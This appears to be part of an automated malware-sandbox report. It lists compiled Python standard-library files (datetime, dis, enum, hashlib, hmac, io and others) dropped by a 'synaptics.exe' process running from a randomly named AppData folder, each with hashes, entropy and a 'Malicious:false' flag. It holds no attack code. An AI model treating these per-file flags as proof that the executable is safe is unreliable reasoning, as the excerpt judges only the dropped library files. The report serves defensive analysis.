                                                                                                                                                                                                            SHA-512:B55BCA8AAE3A788907ACB3417D73D7D46E02A3F460B2FF330775825FB4764B7C39599CE22B0C9EF116C81BB24713F10F4975E92E9F52BE226C183841BA7A5219
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.a.......................@...sr...d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d...Z.d.Z.d.Z.d.Z.g.d...Z.d.g.Z.d.Z.e.d.d.....D.].Z.e...e.....e.e.7.Z.q/[.[.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d...Z.e.d...Z.e.d...Z.e.d.k.scJ...e.d.e...d...k.smJ...e.d.e...d...k.swJ...d.d...Z.g.d...Z.g.d...Z.d d!..Z.d\d#d$..Z.d%d&..Z d'd(..Z!d)d*..Z"d+d,..Z#d-d...Z$d/d0..Z%d1d2..Z&d3d4..Z'd5d6..Z(d7d8..Z)d9d:..Z*d;d<..Z+G.d=d>..d>..Z,e,d?..e,_-e,d@dAdBdBdCdD..e,_.e,d.dE..e,_/G.dFdG..dG..Z0e0Z1e0d.d.d...e0_-e0d.dHdI..e0_.e,d.dJ..e0_/G.dKdL..dL..Z2G.dMdN..dNe3..Z4e4Z5[4e2Z6G.dOdP..dP..Z.e.Z7e.d.d.d...e._-e.dAdBdBdC..e._.e,d.dE..e._/G.dQdR..dRe0..Z8e8d.d.d...e8_-e8d.dHdIdAdBdBdC..e8_.e,d.dE..e8_/dSdT..Z9G.dUdV..dVe2..Z:e:.;e,d.....e:_<e:.;e,dAdBdW......e:_-e:.;e,dAdBdW....e:_.e8dXd.d.e:j<dY..Z=z.d.dZl>T.W.n...e?..y.......Y.d.S.w.[.[.[.[.[.[.[=[.[.[.['[([)[%[&[.[*[1[.[.[.[.[ [.[.[9[.[.[.[7[6[![.[+["[$[#[5d.d[l>m.Z...d.S.)]z.Concrete date/time and related types...See http://www.iana.org/time-
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):15680
                                                                                                                                                                                                            Entropy (8bit):5.468207195328533
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:1DdWn2oDAV888oUZ7tDzEMDfdF6ZSdDz0TxkxVGdAZiVxiEa+0:1DdtoM9UfD6ZBkrYAZiVkEa+0
                                                                                                                                                                                                            MD5:535824047BB2A7E489F63938FD9B28EC
                                                                                                                                                                                                            SHA1:6929ED82F7E2E97E5E8D3C1346CC4C0ABED02455
                                                                                                                                                                                                            SHA-256:28B29480ED144C402AA914FA8D4AE28A2125B8BE8B8A0BACB1498BF6010A3432
                                                                                                                                                                                                            SHA-512:A14C78CBF15EEC67EB3FE1376B73551F649703CF258CEA6DA7D4D38187B80D7968A31DE84EC476C9588E62F819BF6D09EE8B8AA645CE98AADE3303CE9058AF5C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,dPP.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.d.d.l.m.Z...g.d...e...Z.[.e.j.e.j.e.j.e.e.e.f.Z.e.d...Z.d.e.d.f.e.d.f.e.d.f.f.Z.e.d...Z.d.Z.d.d...Z.dVd.d.d...d.d...Z.dVd.d...d.d...Z.d.d.d.d.d.d.d.d.d.d.d...Z.d d!..Z.d"d#..Z.d$d%..Z.d&d'..Z.d.d...d(d)..Z.e.. d*d+..Z!d,e!j"_.d-e!j._.d.e!j#_.d/e!j$_.d0e!j%_.d1e!j&_.d2e!j'_.d3e!j(_.d4Z)d5Z*G.d6d7..d7e!..Z+d.d8..d9d:..Z,d;d<..Z-d=d>..Z.....dWd?d@..Z/dXd.d...dBdC..Z0d.d.d...dDdE..Z1....dYd.d.dF..dGdH..Z2dIdJ..Z3e0Z4dKdL..Z5dMdN..Z6dOdP..Z7G.dQdR..dR..Z8dSdT..Z9e:dUk...r.e9....d.S.d.S.)Zz0Disassembler of Python byte code into mnemonics......N)...*)...__all__)...code_info..dis..disassemble..distb..disco..findlinestarts..findlabels..show_code..get_instructions..Instruction..Bytecode..FORMAT_VALUE).N....str..repr..ascii..MAKE_FUNCTION)...defaults..kwdefaults..annotationsZ.closurec....................C...s4...z.t.|.|.d...}.W.|.S...t.y.......t.|.|.d...}.Y.|.S.w.).z.Attempts to compile the given source, fir
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):26087
                                                                                                                                                                                                            Entropy (8bit):5.286437044537181
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:zFTKcmNJ6I61HjkGoQEARW5nV3j412nrp+6s8LY4F8AGK/h3Ec:zhGNJgJEARW3Ea+VZ4F8AGK/Wc
                                                                                                                                                                                                            MD5:BC8620729B7B02A6C84F48F32DDECEF8
                                                                                                                                                                                                            SHA1:D10DFFE988D97D6D294E661AA950E2104874BC22
                                                                                                                                                                                                            SHA-256:A67119A24241A06065C12C987B3EF5857177A77BE2AB25C5401497736D136AD8
                                                                                                                                                                                                            SHA-512:E5FCE9A23136327B8E13140D369747CBF835D63BCE808731B10F4E8FC5C8F49CE0AA1FB479CECD8FC2BFF55F3A7C7EB36E4B4824B8429545EC1EB2986430D601
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.d.l.Z.d.d.l.m.Z.m.Z...g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.d.Z.G.d.d...d.e...Z.G.d.d...d.e.d...Z.G.d.d...d.e.e...Z.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.d.d ..Z.d!d"..Z.d#d$..Z.d.S.)%.....N)...MappingProxyType..DynamicClassAttribute)...EnumMeta..Enum..IntEnum..Flag..IntFlag..auto..uniquec....................C...s....t.|.d...p.t.|.d...p.t.|.d...S.).z?. Returns True if obj is a descriptor, False otherwise.. ..__get__..__set__..__delete__)...hasattr)...obj..r.....3C:\Users\user\AppData\Local\xFSOj9El1Q\lib\enum.py.._is_descriptor....s..............r....c....................C...sL...t.|...d.k.o%|.d.d.....|.d.d.........k.o.d.k.n.....o%|.d...d.k.o%|.d...d.k.S.).z=. Returns True if a __dunder__ name, False otherwise.. .....N..........Z.__.._.........len....namer....r....r......_is_dunder....s......&...........r....c....................C...sL...t.|...d.k.o%|.d...|.d.......k.o.d.k.n..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4268
                                                                                                                                                                                                            Entropy (8bit):5.669331829509546
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:KZ1NvFl7gPHnZns99V7Ry+/63Tq7Y1qYmWVzHRJwZLaL1iCtiOy9:K1vFl7g/ZnsV7g7HzTRbdUV
                                                                                                                                                                                                            MD5:D5C6C471A0DCB4A121CA930D60F31DA9
                                                                                                                                                                                                            SHA1:DE09AD750348CB01BDAF434787EF1EF96BB4BA50
                                                                                                                                                                                                            SHA-256:34B2A8A6826BC432BE91F10A3B79876F47D151F7C5BE98E10515913F6CC41C27
                                                                                                                                                                                                            SHA-512:D4CC724923E6936C1BD05623C2461ADB900B56973E30C9293DC3547865A5AB3292A3232A6D7B5ED4EE3D46169523BEEA565F8F148D1B40585E40A105B68A74D3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s|...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d.d.l.m.Z...e...j.Z.[.d.d...Z.e.j.d.d.d...d.d.....Z.d.d...Z.d.d...Z.d.d...Z.d.S.).a....Filename matching with shell patterns...fnmatch(FILENAME, PATTERN) matches according to the local convention..fnmatchcase(FILENAME, PATTERN) always takes case in account...The functions operate by translating the pattern into a regular.expression. They cache the compiled regular expressions for speed...The function translate(PATTERN) returns a regular expression.corresponding to PATTERN. (It does not compile it.)......N)...filter..fnmatch..fnmatchcase..translate)...countc....................C...s"...t.j...|...}.t.j...|...}.t.|.|...S.).a....Test whether FILENAME matches PATTERN... Patterns are Unix shell style:.. * matches everything. ? matches any single character. [seq] matches any character in seq. [!seq] matches any char not in seq.. An initial period in FILENAME is not spec
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):28359
                                                                                                                                                                                                            Entropy (8bit):5.3474043970917835
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:loO3KwgQNi3/sZoyIw/kj6N4V9xI8HkXRssPmCzCe/:lo1pQNi30Cj6iV9hHkhsm7me/
                                                                                                                                                                                                            MD5:AEDECF4F366A55D9199AA2B61FD20098
                                                                                                                                                                                                            SHA1:B1B9C57903DE66C1101571F3825683EB9D916DB4
                                                                                                                                                                                                            SHA-256:DEEBF89238F36ECD5AE86D3951571963DB472EA9DD265EFDD0515960027440CC
                                                                                                                                                                                                            SHA-512:2AD41730B542719F1AD43FD866BC2854EBFF8A06143FA10CCB5EC1F5E0FAC9679115E5A9619C427D6A5D9FD581C6021D0E52A010DEE9213D4AC60F987FE4FB35
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.Z.g.d...Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.e.e.f.d.d...Z.e.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d d!..Z.e.f.d"d#..Z.e.f.d$d%..Z.d&e.f.d'e.f.d(e.f.g.d(e.f.d)e.f.d&e.f.g.d)e.f.d(e.f.d'e.f.g.d'e.f.d&e.f.d)e.f.g.d*..Z.d+d,..Z.d-d...Z.z.d.d/l m.Z...W.n...e!y.......Y.n.w.e"..Z#e#f.d0d1..Z$z.d.d2l m$Z$..W.n...e!y.......Y.n.w.G.d3d4..d4..Z%z.d.d5l m%Z%..W.n...e!y.......Y.n.w.G.d6d7..d7e"..Z&d8d9..Z'e.d:g.d;....Z(G.d<d=..d=e)..Z*e"..f.e+e,h.e-e.e/f.d>d?..Z0dXdBdC..Z1dDdE..Z2z.d.dFl m2Z2..W.n...e!..y;......Y.n.w.dGdH..Z3dIdJ..Z4dYdLdM..Z5dNdO..Z6dPdQ..Z7dRdS..Z8G.dTdU..dU..Z9e"..Z:G.dVdW..dW..Z;dKS.)ZzEfunctools.py - Tools for working with functions and callable objects.)...update_wrapper..wraps..WRAPPER_ASSIGNMENTS..WRAPPER_UPDATES..total_ordering..cache..cmp_to_key..lru_cache..reduce..partial..partialmethod..singledispatch..si
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3931
                                                                                                                                                                                                            Entropy (8bit):5.176077173194853
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:NqsfAs4EvMosntVf4/zsSQ1ow+2U/tAaDKDj51dmvuoZ:2s43tKyow8/tjgqWoZ
                                                                                                                                                                                                            MD5:F25127311E03924151ED55C0BE5550AB
                                                                                                                                                                                                            SHA1:6376F1D8E27584C7F6BBC175A7949822567FED8B
                                                                                                                                                                                                            SHA-256:76DA4928AB57D20A0B924D3137C426D68B4BC8D69D1E2AFABB869474E9A7D086
                                                                                                                                                                                                            SHA-512:27C6BB2A0040DC0DBF0F18F880113A749FCD89818F5D2668E29569A700252A1EEC6631F1257558AEAF838D5A54F6D19AFCB389CAB63525B1671636BF5CFC5D30
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).z..Path operations common to more than one OS.Do not use directly. The OS specific modules import the appropriate.functions from this module themselves.......N)...commonprefix..exists..getatime..getctime..getmtime..getsize..isdir..isfile..samefile..sameopenfile..samestatc....................C...s*...z.t...|.....W.d.S...t.t.f.y.......Y.d.S.w.).zDTest whether a path exists. Returns False for broken symbolic linksFT)...os..stat..OSError..ValueError)...path..r.....:C:\Users\user\AppData\Local\xFSOj9El1Q\lib\genericpath.pyr........s................r....c....................C....4...z.t...|...}.W.n...t.t.f.y.......Y.d.S.w.t...|.j...S.).z%Test whether a path is a regular fileF).r....r....r....r......S_ISREG..st_mode).r......str....r....r....r.........................r....c....................C...r....).z<Retu
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5876
                                                                                                                                                                                                            Entropy (8bit):5.144848461998511
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:477f2UQQ4yZsw+LQ4yZs9UfK9BCjbAOp280dqZqh3qX0GqQC7xr8HqRRqhBQoSqj:nXQ7ZMLQ7Z6UC7CjbrpteqZqBqX1qQCW
                                                                                                                                                                                                            MD5:257C3CC56F62969AAA6D6FB25602A56B
                                                                                                                                                                                                            SHA1:7CBA6C90AAC72E761F832C0836EFE9B8E518C0FC
                                                                                                                                                                                                            SHA-256:2EC176004857A754E0F8B970D0C36A5C1144A51E4242BB2B7697B011F7748E38
                                                                                                                                                                                                            SHA-512:00CE07F490D80FA807AD3695765D152AF4787008219B7F78ADFBC5B341B88FBD8087EE3F25D716305FA405354B7A4D73D5C92593574748AC4C0EC367CE24BCC2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d.d.d.d...d.d...Z.d.d.d.d...d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.e...d"..Z.e...d#..Z.d$d%..Z.d&d'..Z.d(d)..Z.d*d+..Z.e.j.e.e.d,d...B.Z d.S.)-z.Filename globbing utility......N)...glob..iglob..escapeF....root_dir..dir_fd..recursivec....................C...s....t.t.|.|.|.|.d.....S.).ay...Return a list of paths matching a pathname pattern... The pattern may contain simple shell-style wildcards a la. fnmatch. However, unlike fnmatch, filenames starting with a. dot are special cases that are not matched by '*' and '?'. patterns... If recursive is true, the pattern '**' will match any files and. zero or more directories and subdirectories.. r....)...listr....)...pathnamer....r....r......r.....3C:\Users\user\AppData\Local\xFSOj9El1Q\lib\glob.pyr........s......r....c....................C...s...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6869
                                                                                                                                                                                                            Entropy (8bit):5.601834586762614
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:jdPjhwzUgQUdROKh0WXI7dQia/ix6s6ct6iojyyt8NQCcx54bNdO9DF4irm/NMlu:jRmE5+odQiaKxJ6ctv4OmVP/4X2J4hg0
                                                                                                                                                                                                            MD5:E8CFFA13A217E490F8FBFAF9BEB9A147
                                                                                                                                                                                                            SHA1:8946BBDFE35CAEC42CAECB3D3B7587F0C3148F01
                                                                                                                                                                                                            SHA-256:65AA2C7A75450AD3092F145549337CC981DF2F1FCCE2D5EFAEFFE9A135C6F39F
                                                                                                                                                                                                            SHA-512:3BB95BA9F6190B10574240275931B2BEAB2FD5DD7EA093395DAB2F0FC834F97756EC1C405DEAF727597F53FA813F56B9229C072A8BA9E5A07D2CF2E49AE87804
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.).......................@...sl...d.Z.d.Z.e.e...Z.e.e...Z.e.d...Z.i.Z.d.d.h.Z.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.z.d.d.l.Z.e.Z.e.Z.e...e.j...Z.W.n...e.yG......d.Z.e.Z.e.Z.Y.n.w.z.d.d.l.m.Z...W.n*..e.yz......d.d.l.m.Z...e.d.d...e.d...D.....Z.e.d.d...e.d...D.....Z.d.d.d...Z.Y.n.w.z.d.d.l.m.Z...W.n...e.y.......Y.n.w.e.D.].Z.z.e.e...e...e.<.W.q...e.y.......d.d.l.Z.e...d.e.....Y.q.w.[.[.[.[.[.[.d.S.).a3...hashlib module - A common interface to many hash functions...new(name, data=b'', **kwargs) - returns a new hash object implementing the. given hash function; initializing the hash. using the given binary data...Named constructor functions are also available, these are faster.than using new(name):..md5(), sha1(), sha224(), sha256(), sha384(), sha512(), blake2b(), blake2s(),.sha3_224, sha3_256, sha3_384, sha3_512, shake_128, and shake_256...More algorithms may be available on your platform but the above are guaranteed
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):13889
                                                                                                                                                                                                            Entropy (8bit):5.355589884204414
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:lnqTYZnQtot7ItafyjjWya/PX7FGRxibJWiTqe0hN2leov+Ugn:lnEYZn0ot7It7j3aX7gRxiM0uN2kk+/n
                                                                                                                                                                                                            MD5:0EE4EE04D9110E62FC27A7DAD6DED74D
                                                                                                                                                                                                            SHA1:D29A5089AC52594BD0EDFBAE4575645EB803B744
                                                                                                                                                                                                            SHA-256:CE943BCE1341CF70BB280035CD41639C71FB1D378812406BFA912D7B1878C411
                                                                                                                                                                                                            SHA-512:EADE22E94F6DACF3A6C6CF1E27996C29AC90B3375660E289FAE903772E25630F37601132FEA0E81EF5611599EC8C8FFCB35EE001BA0FEA66BC4F43C466CD7EB0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.[.......................@...sD...d.Z.d.Z.g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...d.d...Z.d*d d!..Z.d*d"d#..Z.z.d$d%l.T.W.n...e.yY......Y.n.w.z.d$d&l.m.Z...W.n...e.yk......Y.n.w.z.d$d'l.m.Z...W.n...e.y}......Y.n.w.z.d$d(l.m.Z...W.n...e.y.......Y.n.w.e.d)k.r.d$d.l.Z.e.e.........d.S.d.S.)+a....Heap queue algorithm (a.k.a. priority queue)...Heaps are arrays for which a[k] <= a[2*k+1] and a[k] <= a[2*k+2] for.all k, counting elements from 0. For the sake of comparison,.non-existing elements are considered to be infinite. The interesting.property of a heap is that a[0] is always its smallest element...Usage:..heap = [] # creates an empty heap.heappush(heap, item) # pushes a new item on the heap.item = heappop(heap) # pops the smallest item from the heap.item = heap[0] # smallest item on the heap without popping it.heapify(x) # transforms list into a heap, in-place, in linear time
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):13889
                                                                                                                                                                                                            Entropy (8bit):5.355589884204414
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:lnqTYZnQtot7ItafyjjWya/PX7FGRxibJWiTqe0hN2leov+Ugn:lnEYZn0ot7It7j3aX7gRxiM0uN2kk+/n
                                                                                                                                                                                                            MD5:0EE4EE04D9110E62FC27A7DAD6DED74D
                                                                                                                                                                                                            SHA1:D29A5089AC52594BD0EDFBAE4575645EB803B744
                                                                                                                                                                                                            SHA-256:CE943BCE1341CF70BB280035CD41639C71FB1D378812406BFA912D7B1878C411
                                                                                                                                                                                                            SHA-512:EADE22E94F6DACF3A6C6CF1E27996C29AC90B3375660E289FAE903772E25630F37601132FEA0E81EF5611599EC8C8FFCB35EE001BA0FEA66BC4F43C466CD7EB0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.[.......................@...sD...d.Z.d.Z.g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...d.d...Z.d*d d!..Z.d*d"d#..Z.z.d$d%l.T.W.n...e.yY......Y.n.w.z.d$d&l.m.Z...W.n...e.yk......Y.n.w.z.d$d'l.m.Z...W.n...e.y}......Y.n.w.z.d$d(l.m.Z...W.n...e.y.......Y.n.w.e.d)k.r.d$d.l.Z.e.e.........d.S.d.S.)+a....Heap queue algorithm (a.k.a. priority queue)...Heaps are arrays for which a[k] <= a[2*k+1] and a[k] <= a[2*k+2] for.all k, counting elements from 0. For the sake of comparison,.non-existing elements are considered to be infinite. The interesting.property of a heap is that a[0] is always its smallest element...Usage:..heap = [] # creates an empty heap.heappush(heap, item) # pushes a new item on the heap.item = heappop(heap) # pops the smallest item from the heap.item = heap[0] # smallest item on the heap without popping it.heapify(x) # transforms list into a heap, in-place, in linear time
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6997
                                                                                                                                                                                                            Entropy (8bit):5.300873797426216
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:oQFTSdeLSo3yfjb/3xXrCx5PgT1nxc203AbC:oQFT0eLhyX1K5S1nv0QbC
                                                                                                                                                                                                            MD5:5A8D4CEBAF7B9321BF5DB3539EA6851F
                                                                                                                                                                                                            SHA1:669BB4DF38628079FBD22385314DEDF763701BA4
                                                                                                                                                                                                            SHA-256:8F25E2631224367DABD2AC186DD599ED439903E147A9D3A7A0D71D9775A7CDAD
                                                                                                                                                                                                            SHA-512:6CD623A08BCBD549C7530738D3289E8FD09AA26DA15E954C2BBA82F2124A0C0923B2AF1DD5B0018FA162C01A9DE6B8714637A0D44FBD0DE1CEB0A2281F2791D8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.Z.d.d.l.Z.z.d.d.l.Z.W.n...e.y.......d.Z.d.Z.d.d.l.m.Z...Y.n.w.e.j.Z.e.e.j...Z.d.d.l.Z.e.d.d...e.d...D.....Z.e.d.d...e.d...D.....Z.d.Z.G.d.d...d...Z.d.d.d...Z.d.d...Z.d.S.).zqHMAC (Keyed-Hashing for Message Authentication) module...Implements the HMAC algorithm as described by RFC 2104.......N)..._compare_digestc....................c..........|.].}.|.d.A.V...q.d.S.)..\...N.......0..xr....r.....3C:\Users\user\AppData\Local\xFSOj9El1Q\lib\hmac.py..<genexpr>.............r.........c....................c...r....)..6...Nr....r....r....r....r....r........r....c....................@...sf...e.Z.d.Z.d.Z.d.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.e.d.d.....Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...HMACz~RFC 2104 HMAC class. Also complies with RFC 4231... This supports the API for Cryptographic Hash Functions (PEP 247).. .@...)..._hmac.._inner.._outer..block_size..digest_sizeN..c....................C...s....t.|.t.t.f...s.t.d.t.|...j.......|.s.t
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):85177
                                                                                                                                                                                                            Entropy (8bit):5.490205873412749
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:LRc0NzW1X0tJcqYqOWjXHdV352ox842jTk9VBbL+xSjiN2TjJXTpsWTp5JQVXiG0:LRvtW1o737HdV35KNPKmwHtQVSG82IQk
                                                                                                                                                                                                            MD5:D5EBA16E217EC03779A2894CC62EB0AA
                                                                                                                                                                                                            SHA1:1A2AB2972E7F96A21F29306A5DB9AD4C13D9B988
                                                                                                                                                                                                            SHA-256:E7894CC12F7E5E3C90681E0CE07C7FBCCA0A598E0CEC8FC4E34FB1B489A15DB1
                                                                                                                                                                                                            SHA-512:CFAF0B7BE7298114FC899554FCF0BB4CEAE5FFB8E6BDE76CD53444273583ADECBBADAC40B57728E0AA96C11DD6934643EC80FE3B4C8691AB9417F0583F889C6E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...e...Z.e.j.....D.].\.Z.Z.e.e.d.e...<.q^d.Z.d.d.d.d...d.d...Z d.d...Z!d.d...Z"d.d...Z#d.d...Z$d.d...Z%e&e.d...r.d.d...Z'n.d.d...Z'e&e.d...r.d.d...Z(n.d.d...Z(d.d...Z)d d!..Z*d"d#..Z+d$d%..Z,d&d'..Z-d(d)..Z.d*d+..Z/d,d-..Z0d.d/..Z1d0d1..Z2d2d3..Z3d4d5..Z4d6d7..Z5d8d9..Z6d:d;..Z7d.d<d=..Z8e.d>d?..Z9d@dA..Z:dBdC..Z;d.dD..dEdF..Z<dGdH..Z=dIdJ..Z>dKdL..Z?dMdN..Z@dOdP..ZAdQdR..ZBdSdT..ZCdUdV..ZDd.dWdX..ZEi.ZFi.ZGd.dYdZ..ZHG.d[d\..d\eI..ZJG.d]d^..d^e.jK..ZLd_d`..ZMdadb..ZNG.dcdd..ddeI..ZOG.dedf..df..ZPdgdh..ZQdidj..ZRdkdl..ZSdmdn..ZTd.dodp..ZUe.dqdr..ZVdsdt..ZWe.dudv..ZXdwdx..ZYe.dydz..ZZd{d|..Z[e.d}d~..Z\d.d...Z]d.d.d...Z^d.d...Z_d.d.d.d.i.i.e`d.d...d.d...d.d...d.d...e^f.d.d...Zae`d.d...d.d...d.d...f.d.d...Zbd.d...Zcd.d...Zdd.d...Zee.d.d...Zfd.d...Zge.d.d...Zhd.d.d...Zid.d...Zje.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3687
                                                                                                                                                                                                            Entropy (8bit):5.398638238986771
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:l4jeBVAsKEv1YlurRNZsmi/VA61vWF/3+XIQjC2Ai3QuAXuhgwGBQPOcGcMzzMfM:GUK0iSxOmoWF2vLAy/hyKP7GcmYa7RXn
                                                                                                                                                                                                            MD5:852AD2AF8B4AA6D5DA4AE89EAE320507
                                                                                                                                                                                                            SHA1:D8452AC9A94FC5964B9DC6E86611530F68B36937
                                                                                                                                                                                                            SHA-256:3A236A31CFF7F8A4D5035006229E2492F7F8B41B190979490A3B09EFDB83AF01
                                                                                                                                                                                                            SHA-512:BB3A9B6E5129A7512B1624725834C523409E7A8C8C891A46B16BFC588112F2F572CD0031220FBA9E9383263207AD0D88A70BB855FFD18212989D7A0C817183C3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...sH...d.Z.d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d...Z.d.e._.d.Z.d.Z.d.Z.G.d.d...d.e.j.e.j.d...Z.G.d.d...d.e.j.e...Z.G.d.d...d.e.j.e...Z.G.d.d...d.e.j e...Z!e.."e.....e.e.e.e.e.f.D.].Z#e.."e#....que.e.f.D.].Z#e!."e#....q.[#z.d.d.l.m$Z$..W.n...e%y.......Y.d.S.w.e.."e$....d.S.).a....The io module provides the Python interfaces to stream handling. The.builtin open function is defined in this module...At the top of the I/O hierarchy is the abstract base class IOBase. It.defines the basic interface to a stream. Note, however, that there is no.separation between reading and writing to streams; implementations are.allowed to raise an OSError if they do not support a given operation...Extending IOBase is RawIOBase which deals simply with the reading and.writing of raw bytes to a stream. FileIO subclasses RawIOBase to provide.an interface to OS files...BufferedIOBase deals with buffering on a raw
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):61475
